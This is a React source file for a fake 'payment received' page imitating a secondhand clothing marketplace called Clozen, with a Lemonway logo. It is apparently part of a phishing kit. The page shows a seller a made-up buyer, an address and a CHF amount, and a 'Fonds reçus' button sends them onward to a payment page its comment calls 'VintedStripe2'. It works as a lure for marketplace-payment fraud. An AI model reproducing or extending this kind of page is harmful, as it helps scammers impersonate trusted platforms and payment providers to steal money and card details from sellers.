import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './ClozenChSuccess.css';
import SupportWidget from './SupportWidget';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const CLOZEN_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/clozen-logo.png`;
const LEMONWAY_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/lemonway-logo.png`;

function SearchIcon() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z" />
    </svg>
  );
}

function ZoomIcon() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <circle cx="11" cy="11" r="8" />
      <path d="M21 21l-4.35-4.35" />
      <path d="M11 8v6M8 11h6" strokeLinecap="round" />
    </svg>
  );
}

/**
 * Clozen (CH, FR) — écran transaction après captcha; puis index2 (VintedStripe2).
 */
function ClozenChSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'CH').toUpperCase();

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  })();

  const priceText =
    Number.isFinite(priceNumber) && priceNumber % 1 === 0
      ? String(priceNumber.toFixed(0))
      : String(priceNumber);

  const fn = (pageData?.first_name || '').trim();
  const ln = (pageData?.last_name || '').trim();
  const buyerFull = [fn, ln].filter(Boolean).join(' ') || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productTitle = (pageData?.product_name || '').trim() || '—';
  const photoUrl = pageData?.photo_url || '';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const cats = ['Femme', 'Homme', 'Fille', 'Garçon', 'Bébé Fille', 'Bébé Garçon'];

  if (loading && pageCode) {
    return (
      <div className="clozen-wrap">
        <div className="clozen-loading">Chargement…</div>
        <div className="clozen-support">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="clozen-wrap">
      <header className="clozen-header">
        <div className="clozen-header-top">
          <a href="#/" className="clozen-logo" aria-label="Clozen">
            <img src={CLOZEN_LOGO_SRC} alt="Clozen" className="clozen-logo-img" width={120} height={36} />
          </a>
          <div className="clozen-search-wrap">
            <div className="clozen-search">
              <input type="search" placeholder="Rechercher des articles." readOnly aria-label="Recherche" />
              <button type="button" className="clozen-search-btn" aria-label="Rechercher">
                <SearchIcon />
              </button>
            </div>
          </div>
          <div className="clozen-header-actions">
            <div className="clozen-icon-row" aria-hidden>
              <button type="button" className="clozen-icon-btn" aria-label="Messages">
                <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
                  <path d="M4 4h16c1.1 0 2 .9 2 2v12c0 1.1-.9 2-2 2H4c-1.1 0-2-.9-2-2V6c0-1.1.9-2 2-2z" />
                  <path d="m22 6-10 7L2 6" />
                </svg>
              </button>
              <button type="button" className="clozen-icon-btn" aria-label="Support">
                <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
                  <path d="M3 18v-3a9 9 0 0 1 18 0v3" />
                  <rect x="2" y="14" width="4" height="5" rx="1" />
                  <rect x="18" y="14" width="4" height="5" rx="1" />
                </svg>
              </button>
              <button type="button" className="clozen-icon-btn" aria-label="Favoris">
                <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
                  <path d="M20.84 4.61a5.5 5.5 0 0 0-7.78 0L12 5.67l-1.06-1.06a5.5 5.5 0 0 0-7.78 7.78l1.06 1.06L12 21.23l7.78-7.78 1.06-1.06a5.5 5.5 0 0 0 0-7.78z" />
                </svg>
              </button>
              <button type="button" className="clozen-icon-btn" aria-label="Profil">
                <svg width="22" height="22" viewBox="0 0 24 24" fill="currentColor">
                  <path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z" />
                </svg>
              </button>
            </div>
            <button type="button" className="clozen-sell-btn">
              Vendre maintenant
            </button>
            <button type="button" className="clozen-lang">
              FR <span aria-hidden>▾</span>
            </button>
          </div>
        </div>
        <nav className="clozen-nav-cats" aria-label="Catégories">
          {cats.map((c) => (
            <a key={c} href="#/">
              {c}
            </a>
          ))}
        </nav>
      </header>

      <main className="clozen-main">
        <div className="clozen-grid">
          <div className="clozen-visual">
            <button type="button" className="clozen-zoom" aria-label="Agrandir">
              <ZoomIcon />
            </button>
            <div className="clozen-visual-inner">
              {photoUrl ? (
                <img src={photoUrl} alt="" />
              ) : (
                <div className="clozen-photo-fallback" aria-hidden>
                  {Array.from({ length: 12 }).map((_, i) => (
                    <span key={i} className="clozen-fallback-cell" />
                  ))}
                </div>
              )}
            </div>
          </div>

          <div className="clozen-detail">
            <h1 className="clozen-title">{productTitle}</h1>
            <p className="clozen-status">LA MARCHANDISE A ÉTÉ PAYÉE PAR L&apos;ACHETEUR</p>
            <p className="clozen-price-big">CHF {priceText}</p>

            <div className="clozen-buyer-block">
              <h2 className="clozen-buyer-heading">Informations sur l&apos;acheteur</h2>
              <dl className="clozen-dl">
                <div>
                  <dt>Nom de l&apos;acheteur</dt>
                  <dd>{buyerFull}</dd>
                </div>
                <div>
                  <dt>Adresse de l&apos;acheteur</dt>
                  <dd>{address}</dd>
                </div>
                <div>
                  <dt>Montant à recevoir</dt>
                  <dd className="clozen-dd-amount">CHF {priceText}</dd>
                </div>
              </dl>
            </div>

            <Link to={index2Path} className="clozen-cta">
              Fonds reçus
            </Link>
          </div>
        </div>
      </main>

      <footer className="clozen-footer">
        <div className="clozen-footer-inner">
          <nav className="clozen-footer-links">
            <a href="#/">Conditions générales</a>
            <a href="#/">Politique de confidentialité</a>
            <a href="#/">Gérer ses cookies</a>
            <a href="#/">Impressum</a>
          </nav>
          <div className="clozen-footer-right">
            <img
              src={LEMONWAY_LOGO_SRC}
              alt="Lemonway"
              className="clozen-lemonway-img"
            />
            <div className="clozen-social" aria-label="Réseaux sociaux">
              <a href="#/" aria-label="Instagram" className="clozen-soc">
                <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor">
                  <path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zM12 0C8.741 0 8.333.014 7.053.072 2.695.272.273 2.69.073 7.052.014 8.333 0 8.741 0 12c0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98C8.333 23.986 8.741 24 12 24c3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98C15.668.014 15.259 0 12 0zm0 5.838a6.162 6.162 0 1 0 0 12.324 6.162 6.162 0 0 0 0-12.324zM12 16a4 4 0 1 1 0-8 4 4 0 0 1 0 8zm6.406-11.845a1.44 1.44 0 1 0 0 2.881 1.44 1.44 0 0 0 0-2.881z" />
                </svg>
              </a>
              <a href="#/" aria-label="TikTok" className="clozen-soc">
                <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor">
                  <path d="M19.59 6.69a4.83 4.83 0 0 1-3.77-4.25V2h-3.45v13.67a2.89 2.89 0 0 1-5.2 1.74 2.89 2.89 0 0 1 2.31-4.64v-3.5a6.67 6.67 0 0 0-1-.05A6.33 6.33 0 0 0 5 20.1a6.34 6.34 0 0 0 10.86-4.43v-7a8.16 8.16 0 0 0 4.77 1.52v-3.4a4.85 4.85 0 0 1-1-.1z" />
                </svg>
              </a>
              <a href="#/" aria-label="Facebook" className="clozen-soc">
                <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor">
                  <path d="M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z" />
                </svg>
              </a>
              <a href="#/" aria-label="YouTube" className="clozen-soc">
                <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor">
                  <path d="M23.498 6.186a3.016 3.016 0 0 0-2.122-2.136C19.505 3.545 12 3.545 12 3.545s-7.505 0-9.377.505A3.017 3.017 0 0 0 .502 6.186C0 8.07 0 12 0 12s0 3.93.502 5.814a3.016 3.016 0 0 0 2.122 2.136c1.871.505 9.376.505 9.376.505s7.505 0 9.377-.505a3.015 3.015 0 0 0 2.122-2.136C24 15.93 24 12 24 12s0-3.93-.502-5.814zM9.545 15.568V8.432L15.818 12l-6.273 3.568z" />
                </svg>
              </a>
            </div>
          </div>
        </div>
      </footer>

      <div className="clozen-support">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default ClozenChSuccess;
